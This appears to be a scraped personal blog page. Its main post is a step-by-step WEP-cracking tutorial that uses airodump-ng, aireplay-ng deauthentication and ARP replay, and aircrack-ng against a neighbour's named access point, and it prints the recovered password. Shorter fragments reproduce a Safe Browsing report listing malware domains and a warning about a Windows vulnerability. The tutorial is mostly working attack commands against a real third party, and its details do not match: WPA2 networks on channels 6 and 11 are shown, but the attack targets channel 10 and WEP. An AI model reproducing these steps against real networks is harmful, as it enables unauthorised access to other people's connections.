ESSID:”Starbucks”
Mode:Master
Channel:6
Frequency:2.437 GHz (Channel 6)
Quality=45/100 Signal level:-82 dBm Noise level=-97 dBm
Encryption key:on
IE: Unknown: 0009537461726275636B73
IE: Unknown: 010882848B0C12961824
IE: Unknown: 030106
IE: IEEE 802.11i/WPA2 Version 1
Group Cipher : TKIP
Pairwise Ciphers (2) : CCMP TKIP
Authentication Suites (1) : PSK
IE: WPA Version 1
Group Cipher : TKIP
Pairwise Ciphers (2) : CCMP TKIP
Authentication Suites (1) : PSK
IE: Unknown: 2A0100
IE: Unknown: 32043048606C
IE: Unknown: DD0900037F01010060FF7F
IE: Unknown: DD050050F20500
IE: Unknown: DD750050F204104A0001101
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
48 Mb/s; 54 Mb/s
Extra:tsf=000000a10cbf6181
Extra: Last beacon: 472ms ago
Cell 05 – Address: 00:1E:40:66:67:29
ESSID:”Streamyx Mobility”
Mode:Master
Channel:11
Frequency:2.462 GHz (Channel 11)
Quality=45/100 Signal level:-82 dBm Noise level=-97 dBm
Encryption key:on
IE: Unknown: 001153747265616D7978204D6F62696C697479
IE: Unknown: 010882848B962430486C
IE: Unknown: 03010B
IE: Unknown: 2A0104
IE: Unknown: 2F0104
IE: Unknown: 32040C121860
IE: Unknown: DD060010180200F4
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
24 Mb/s; 36 Mb/s; 54 Mb/s; 6 Mb/s; 9 Mb/s
12 Mb/s; 48 Mb/s
Extra:tsf=00000001118f4184
Extra: Last beacon: 136ms ago
Ok, look at the output, focus on the channel target of the APs. In this example, I’m choosing channel 10 for my practice.
3. Now, execute below command:
sudo airodump-ng -w capture -c 10 wlan0
Now you should see something like this:
If you have error, means that your wifi adapter is busy/ already connected to AP, do below command: If u dont have any problem, just proceed with step 7.
4.
sudo airmon-ng start wlan0
and choose the mode enabled:
5.
Interface Chipset Driver
wlan0 Intel 3945ABG iwl3945 – [phy0]
(monitor mode enabled on mon0)
This actually created another interface which is mon0
6. If you have previous error run with the new command
sudo airodump-ng -w capture -c 10 mon0
If you dont have error, just procede with wlan0.
Leave it running for a while. Focus on the MAC address of your desired AP and the notice the data increasing.
7. Now, open new tab in console and type:
sudo aireplay-ng -e PETRONAS1 -a 00:1E:40:DD:81:60 -c 00:19:D2:00:E6:37 –deauth 10 wlan0
-a 00:1E:40:DD:81:60 : MAC address of targeted AP (PETRONAS1)
-c 00:19:D2:00:E6:37 : MAC address of machine connected to the targeted AP. (This can be seen in the airodump at previous tab).
From this command, you can see the output:
8. Then, open another tab and type:,
sudo aireplay-ng –arpreplay -b 00:1E:40:DD:81:60 -h 00:19:D2:00:E6:37 wlan0
-b 00:1E:40:DD:81:60 : MAC address of targeted AP
-h 00:19:D2:00:E6:37 : MAC address of machine connected to the AP
run the command and we can see it searching for packets. Here you can see the connection of targeted AP and machine connected to it:
9. Lastly, open another tab and type:
sudo aircrack-ng -f 4 -m 00:1E:40:DD:81:60 -n 128 capture.cap
-m 00:1E:40:DD:81:60 : the targeted MAC address
Here, i’m using 128 bit key encryption, assuming you know/guess/search for the targeted WEP key bit encryption. Below are when aircrack are pawning/decode the key:
10. Make it run and leave it until it finds/ the packets captured are enough to decrypt
the key password. The longer/complicated the passphare key, the more time acquire to crack it.. So in my case, i’m waited for about 10 minutes.. Lucky me
Password : petronas12345
p/s: this is for educational purpose, my neighbor has been informed about this and they have change their passphare to new and stronger password key.
Now, to test it, try to connect :
Success!
Here we see how simple and lame passphrase can be manipulated by others. So make it long and complicated, not easy to guess.
If your Internet connection is slow, someone is riding behind you
I’ve encountered a website (forum) which declared by google chrome browser containing malware. Funny not in firefox .. IE? lol
The output from Google safebrowsing
Safe Browsing
Diagnostic page for www.webdirectory.com.myWhat is the current listing status for www.webdirectory.com.my?
Site is listed as suspicious – visiting this web site may harm your computer.Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.
What happened when Google visited this site?
Of the 254 pages we tested on the site over the past 90 days, 32 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-10-29, and the last time suspicious content was found on this site was on 2009-10-21.
Malicious software is hosted on 6 domain(s), including stone-sour.cn/, alinaturu.info/, guardpconline.com/.4 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including waveevolution.com/, alinaturu.info/, designblogger.cn/.
This site was hosted on 1 network(s) including AS17971 (EASTGATE).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, www.webdirectory.com.my did not appear to function as an intermediary for the infection of any sites.Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
I know this alert has been out for about a month.. but i’m pretty sure MANY of the windows user out there are not aware of this. This is still ‘panas’ as many of those who knew this will try on the local network to see the results.
If you think you are not affected, think again. List of windows operating systems that are vulnerable:
* Windows Vista Service Pack 0, Service Pack 1 and Service Pack 2
* Windows Vista x64 Edition Service Pack 0, Service Pack 1 and Service Pack 2
* Windows Server 2008 for 32-bit Systems Service Pack 0 and Service Pack 2
* Windows Server 2008 for x64-based Systems, Service Pack 0 and Service Pack 2
* Windows Server 2008 for Itanium-based, Service Pack 0 and Service Pack 2
this probably including the Windows 7 versions. Users are advice to follow steps here
or install the fix by microsoft here
as shown here, my friends link on the exploit been done.. you’ve been warned
salawank is Digg proof thanks to caching by WP Super Cache
